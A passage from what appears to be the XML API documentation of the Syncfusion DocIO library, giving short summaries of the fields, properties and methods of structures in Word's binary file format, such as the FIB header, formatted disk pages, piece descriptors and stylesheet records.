            Summary description for FIBHeader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.DEF_HEADER_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.wIdent">
            <summary>
            magic number
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.nFib">
            <summary>
            FIB version written. This will be >= 101 for all Word 6.0 for Windows and after documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.nProduct">
            <summary>
            product version written by
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.lid">
            <summary>
            language stamp -- localized version
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.pnNext">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.m_usOptions">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.nFibBack">
            <summary>
            This file format it compatible with readers that understand nFib at or above this value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.lKey">
            <summary>
            File encrypted key, only valid if fEncrypted.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.envr">
            <summary>
            environment in which file was created
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.m_btOptions2">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.chs">
            <summary>
            Default extended character set id for text in document stream. (overridden by chp.chse)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.chsTables">
            <summary>
            Default extended character set id for text in internal data structures
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.fcMin">
            <summary>
            file offset of first character of text. In non-complex files a CP can be transformed into an FC by the following transformation:
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.fcMac">
            <summary>
            file offset of last character of text in document text stream + 1
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.csw">
            <summary>
            Count of fields in the array of "shorts"
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBHeader.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.DEF_OFFSET_SHORTS_COUNT">
            <summary>
            Offset to count of shorts field
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.DEF_SHORT_BYTES">
            <summary>
            Number of bytes in short value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.DEF_LONG_BYTES">
            <summary>
            Number of bytes in member of "array of longs".
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.DEF_FCLCB_BYTES">
            <summary>
            Size of FC / LCB pair.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.header">
            <summary>
            Fib header.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.arrShorts">
            <summary>
            Array of shorts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.clw">
            <summary>
            Number of fields in the array of longs
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.arrLongs">
            <summary>
            Array of longs
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.cfclcb">
            <summary>
            Number of fields in the array of FC/LCB pairs.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.arrFCLCB">
            <summary>
            Array of FC/LCB.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.Parse(System.IO.Stream,System.Boolean)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="isDecryptedStream">if it is decrypted stream, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.Save(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FIBStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure">
            <summary>
            Formatted disK Page - 512 bytes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.DEF_RECORD_SIZE">
            <summary>
            Size of the record.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.m_arrPageData">
            <summary>
            Page data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.m_btLength">
            <summary>
            Count of elements in the array.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.Save(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.PageData">
            <summary>
            Page data.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.Count">
            <summary>
            Count of elements.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure">
            <summary>
            Summary description for ParagraphHeightStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure.Options">
            <summary>
            Options.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure.Width">
            <summary>
            Width of lines in paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure.Height">
            <summary>
            when IsDiffLines is 0, is height of every line in paragraph in pixels
            when IsDiffLines is 1, is the total height in pixels of the paragraph
            
            If the PHE is stored in a PAP whose fTtp field is set (non-zero),
            height of table row
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ParagraphHeightStructure.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.DEF_PRM_OFFSET">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.m_usOptions">
            <summary>
            Options
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.m_fc">
            <summary>
            file offset of beginning of piece. The size of the ith piece can be determined by subtracting rgcp[i] of the containing plcfpcd from its rgcp[i+1].
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.m_prm">
            <summary>
            contains either a single Single Property Modifier Record or else an index number of the grpprl which contains the sprms that modify the properties of the piece.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">Destination data array</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.Options">
            <summary>
            Options.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.FileOffset">
            <summary>
            File offset of beginning of piece.The size of the ith piece can be determined
            by subtracting rgcp[i] of the containing plcfpcd from its rgcp[i+1].
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.PropertyModifier">
            <summary>
            Contains either a single Single Property Modifier Record or else an index number of the grpprl
            which contains the sprms that modify the properties of the piece.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PieceDescriptorStructure.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure">
            <summary>
            Summary description for PropertyModifierStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.DEF_BIT_COMPLEX">
            <summary>
            Bit index for IsComplex value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.DEF_RECORD_SIZE">
            <summary>
            Size of the record in bytes;
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.m_usOptions">
            <summary>
            Options.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.Parse(System.Byte[],System.Int32@)">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.Save(System.Byte[],System.Int32@)">
            <summary>
            Saves structure to specified data array.
            </summary>
            <param name="arrData">The array with data.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.IsComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.PropertyModifierStructure.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure">
            <summary>
            Summary description for SectionDescriptorStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.m_sInternal">
            <summary>
            used internally by Word (fn).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.m_fcSepx">
            <summary>
            file offset in main stream to beginning of SEPX stored for section.
            If sed.fcSepx == 0xFFFFFFFF, the section properties for the section are equal
            to the standard SEP (see SEP definition).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.m_sInternal2">
            <summary>
            used internally by Word (fnMpr).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.m_fcMpr">
            <summary>
            Points to offset in FC space of main stream where the Macintosh Print Record
            for a document created on a Mac will be stored.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.Internal1">
            <summary>
            used internally by Word (fn).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.Internal2">
            <summary>
            used internally by Word (fnMpr).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.SepxPosition">
            <summary>
            file offset in main stream to beginning of SEPX stored for section.
            If sed.fcSepx == 0xFFFFFFFF, the section properties for the section are equal
            to the standard SEP (see SEP definition).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.MacPrintOffset">
            <summary>
            Points to offset in FC space of main stream where the Macintosh Print Record
            for a document created on a Mac will be stored.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.SectionDescriptorStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase">
            <summary>
            Base part of StyleDefinition.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_RECORD_SIZE">
            <summary>
            Number of bytes in the record.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_START_ID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_MASK_ID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_SCRATCH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_INVALID_HEIGHT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_HAS_UPE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_MASS_COPY">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_MASK_TYPE_CODE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_START_TYPE_CODE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_MASK_BASE_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_START_BASE_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_MASK_UPX_NUMBER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_START_UPX_NUMBER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_MASK_NEXT_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_START_NEXT_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_AUTO_REDEFINE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_HIDDEN">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_SEMIHIDDEN">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_UNHIDEUSED">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.DEF_BIT_QFORMAT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.m_usOptions1">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.m_usOptions2">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.m_usOptions3">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.m_usUpeOffset">
            <summary>
            Offset to end of upx's, start of upe's (bchUpe).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.m_usOptions4">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.m_usOptions5">
            <summary>
            Option flags (contain info about links)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.Clear">
            <summary>
            Resets all fields.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arr">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.StyleId">
            <summary>
            Invariant style identifier.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsScratch">
            <summary>
            Spare field for any temporary use, always reset back to zero!
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsInvalidHeight">
            <summary>
            PHEs of all text with this style are wrong.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.HasUpe">
            <summary>
            Indicates whether UPEs have been generated.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsMassCopy">
            <summary>
            std has been mass-copied; if unused at save time, style should be deleted.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.TypeCode">
            <summary>
            Style type code.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.BaseStyle">
            <summary>
            Base style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.UPEOffset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.UpxNumber">
            <summary>
            Number of UPXs (and UPEs).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.NextStyleId">
            <summary>
            Next style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsAutoRedefine">
            <summary>
            Auto redefine style when appropriate
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsHidden">
            <summary>
            Indicates whether style is hidden from UI.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.LinkStyleId">
            <summary>
            Gets or sets the link style id.
            </summary>
            <value>The link style id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsSemiHidden">
            <summary>
            Indicates whether style is hidden from UI.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.IsQFormat">
            <summary>
            Indicates whether style is hidden from UI.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleDefinitionBase.UnhideWhenUsed">
            <summary>
            Indicates whether style is hidden from UI.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure">
            <summary>
            STSHI: STyleSHeet Information, as stored in a file
            Note that new fields can be added to the STSHI without invalidating
            the file format, because it is stored preceded by it's length.
            When reading a STSHI from an older version, new fields will be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.DEF_BIT_STYLE_NAMES_WRITTEN">
            <summary>
            Bit index for StdStyleNamesWritten property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.DEF_RECORD_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_usStylesCount">
            <summary>
            Count of styles in stylesheet (cstd).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_usSTDBaseLength">
            <summary>
            Length of STD Base as stored in a file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_usOptions">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_usStiMaxWhenSaved">
            <summary>
            Max sti known when this file was written (StiMaxWhenSaved).
            This indicates the last built-in style known to the version of Word
            that saved this file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_usISTDMaxFixedWhenSaved">
            <summary>
            How many fixed-index istds are there?
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_usBuiltInNamesVersion">
            <summary>
            Current version of built-in stylenames (nVerBuiltInNamesWhenSaved).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_arrStandardChpStsh">
            <summary>
            ftc used by StandardChpStsh for this document (rgftcStandardChpStsh).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.m_ftcBi">
            <summary>
             Represents the sprmCFtcBi for default document formatting
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the specifies structure.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.StylesCount">
            <summary>
            Count of styles in stylesheet (cstd).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.STDBaseLength">
            <summary>
            Length of STD Base as stored in a file (cbSTDBaseInFile).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.IsStdStyleNamesWritten">
            <summary>
            Indicates whether built-in stylenames are stored.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.StiMaxWhenSaved">
            <summary>
            Max sti known when this file was written.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.ISTDMaxFixedWhenSaved">
            <summary>
            How many fixed-index istds are there?
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.BuiltInNamesVersion">
            <summary>
            Current version of built-in stylenames (nVerBuiltInNamesWhenSaved).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.StandardChpStsh">
            <summary>
            ftc used by StandardChpStsh for this document. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.FtcBi">
            <summary>
            Gets and sets the default Bidi font
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.StyleSheetInfoStructure.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure">
            <summary>
            Summary description for TableCellStructure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.DEF_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.m_rgf">
             <summary>
             A - horzMerge (2 bits): A value that specifies how this cell merges horizontally with the neighbouring cells in the same row. This value MUST be one of the following.
             0 - The cell is not merged with the cells on either side of it.
